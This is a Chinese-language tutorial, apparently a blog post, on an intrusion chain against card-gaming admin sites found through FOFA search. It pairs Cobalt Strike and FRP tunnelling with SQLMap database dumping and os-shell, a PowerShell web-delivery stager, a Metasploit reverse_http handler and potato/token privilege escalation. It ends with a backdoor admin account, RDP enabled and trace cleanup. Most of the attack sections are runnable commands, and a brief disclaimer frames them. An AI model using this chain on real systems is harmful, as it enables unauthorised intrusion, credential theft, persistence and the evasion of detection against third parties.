frp过来cs上线一起打牌吧
字数 970 2025-08-15 21:32:18

CS4.0与FRP内网穿透联合渗透实战教程

免责声明

本文提及的安全环境、工具和方法等仅供安全研究及教学用途,禁止非法使用!请在24小时内删除相关测试数据!

前期准备

1. Cobalt Strike 4.0服务端搭建

  1. 下载CS4.0安装包并上传至服务器(示例使用阿里云)
  2. 解压安装包后,为teamserver文件添加执行权限:
    chmod 777 teamserver
    
  3. 启动CS服务端:
    ./teamserver [阿里云服务器IP] [密码]
    
  4. 客户端连接:在本地电脑或虚拟机上执行bat文件,输入服务器IP和密码连接

2. FRP内网穿透配置

  1. 下载FRP压缩包并上传服务器解压
  2. 修改服务端配置文件frps.ini
    [common]
    bind_port = 4444
    
  3. 启动FRP服务端:
    ./frps -c frps.ini
    
  4. 在Kali中配置frpc.ini并启动客户端

后台启动命令:

服务端:

nohup ./frps -c frps.ini >/dev/null 2>&1 &

客户端:

nohup ./frpc -c frpc.ini >/dev/null 2>&1 &

渗透测试实战

1. 目标识别与信息收集

使用FOFA搜索引擎查找目标:

body="qipai后台管理系统" && title=="后台登录"

2. SQL注入利用

  1. 抓取登录数据包保存为post.txt
  2. 使用SQLMap进行注入:
    # 获取数据库名
    sqlmap -r post.txt --dbs
    
    # 获取指定数据库表名
    sqlmap -r post.txt -D RYPlatformManagerDB --tables
    
    # 获取表字段
    sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --columns
    
    # 导出表数据
    sqlmap -r post.txt -D RYPlatformManagerDB -T dbo.Base_Users --dump
    
  3. 破解MD5加密密码或使用弱密码尝试登录

3. 获取交互式Shell

  1. 通过SQLMap获取os-shell:
    sqlmap -r post.txt --os-shell
    
  2. 在CS中选择"攻击-钓鱼-scripted WEB Delivery"生成PowerShell命令
  3. 将生成的PS命令粘贴到os-shell中执行

4. 会话传递与权限提升

  1. CS到MSF会话传递:

    • 确保FRP服务端和客户端已启动
    • 在Kali中启动MSF监听:
      msfconsole
      use exploit/multi/handler
      set payload windows/meterpreter/reverse_http
      set LHOST 127.0.0.1
      set LPORT 1234
      run
      
    • 在CS中添加对应监听器并迁移会话
  2. 权限提升(烂土豆提权):

    # 上传提权工具
    meterpreter > upload /root/potato.exe C:\\Users\\Public
    
    # 切换目录
    meterpreter > cd C:\\Users\\Public
    
    # 查看令牌
    meterpreter > use incognito
    meterpreter > list_tokens -u
    
    # 执行提权
    meterpreter > execute -cH -f ./potato.exe
    
    # 窃取SYSTEM令牌
    meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
    meterpreter > getuid
    

5. 后渗透操作

  1. 创建管理员用户:
    net user [username] [password] /add
    net localgroup administrators [username] /add
    
  2. 开启远程桌面:
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    
  3. 清理痕迹后关机

技术要点总结

  1. 联合工具链使用:CS4.0 + FRP + MSF + SQLMap
  2. 内网穿透技术:通过FRP实现本地到公网的端口映射
  3. 权限提升技术:利用MS16-075漏洞(烂土豆提权)
  4. 横向移动技术:从Web渗透到系统权限获取的全过程
  5. 痕迹清理:操作完成后清除日志等痕迹

注意事项

  1. 所有操作应在授权范围内进行
  2. 测试完成后及时清理测试数据
  3. 提权操作可能对系统稳定性造成影响
  4. RDP开启可能触发安全警报

工具获取

文中使用到的工具可通过指定渠道获取(此处省略具体获取方式)。


本教程详细记录了从信息收集到获取系统权限的全过程,重点展示了多种安全工具的联合使用方法和权限提升技术。请务必遵守法律法规,仅将此类知识用于合法授权的安全测试和防御研究。

CS4.0与FRP内网穿透联合渗透实战教程 免责声明 本文提及的安全环境、工具和方法等仅供安全研究及教学用途,禁止非法使用!请在24小时内删除相关测试数据! 前期准备 1. Cobalt Strike 4.0服务端搭建 下载CS4.0安装包并上传至服务器(示例使用阿里云) 解压安装包后,为teamserver文件添加执行权限: 启动CS服务端: 客户端连接:在本地电脑或虚拟机上执行bat文件,输入服务器IP和密码连接 2. FRP内网穿透配置 下载FRP压缩包并上传服务器解压 修改服务端配置文件 frps.ini : 启动FRP服务端: 在Kali中配置 frpc.ini 并启动客户端 后台启动命令: 服务端: 客户端: 渗透测试实战 1. 目标识别与信息收集 使用FOFA搜索引擎查找目标: 2. SQL注入利用 抓取登录数据包保存为 post.txt 使用SQLMap进行注入: 破解MD5加密密码或使用弱密码尝试登录 3. 获取交互式Shell 通过SQLMap获取os-shell: 在CS中选择"攻击-钓鱼-scripted WEB Delivery"生成PowerShell命令 将生成的PS命令粘贴到os-shell中执行 4. 会话传递与权限提升 CS到MSF会话传递: 确保FRP服务端和客户端已启动 在Kali中启动MSF监听: 在CS中添加对应监听器并迁移会话 权限提升(烂土豆提权): 5. 后渗透操作 创建管理员用户: 开启远程桌面: 清理痕迹后关机 技术要点总结 联合工具链使用 :CS4.0 + FRP + MSF + SQLMap 内网穿透技术 :通过FRP实现本地到公网的端口映射 权限提升技术 :利用MS16-075漏洞(烂土豆提权) 横向移动技术 :从Web渗透到系统权限获取的全过程 痕迹清理 :操作完成后清除日志等痕迹 注意事项 所有操作应在授权范围内进行 测试完成后及时清理测试数据 提权操作可能对系统稳定性造成影响 RDP开启可能触发安全警报 工具获取 文中使用到的工具可通过指定渠道获取(此处省略具体获取方式)。 本教程详细记录了从信息收集到获取系统权限的全过程,重点展示了多种安全工具的联合使用方法和权限提升技术。请务必遵守法律法规,仅将此类知识用于合法授权的安全测试和防御研究。